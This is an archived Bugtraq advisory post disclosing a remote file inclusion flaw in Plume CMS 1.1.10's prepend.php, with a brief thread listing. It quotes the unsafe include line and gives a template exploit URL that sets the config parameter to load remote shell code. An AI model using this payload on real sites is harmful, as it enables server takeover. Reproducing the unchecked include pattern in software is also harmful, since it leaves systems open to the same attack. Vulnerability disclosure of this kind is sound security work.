Bugtraq mailing list archives

Plume CMS <= 1.1.10 [prepend.php] Remote File Include Vulnerability

From: D3nGeR () Gmail CoM
Date: 15 Sep 2006 22:11:57 -0000

Vendor: Plume CMS 1.1.10
Found By : D3nGeR
Scripit Site : http://plume-cms.net

in file [prepend.php]

;
include_once $_PX_config['manager_path'].'/inc/class.config.php'

code
http://site.com/[path]manager/frontinc/prepend.php?_PX_config[manager_path]=[shell code ]

Current thread:

Plume CMS <= 1.1.10 [prepend.php] Remote File Include Vulnerability D3nGeR (Sep 18)
- Re: Plume CMS <= 1.1.10 [prepend.php] Remote File Include Vulnerability Craig Morrison (Sep 19)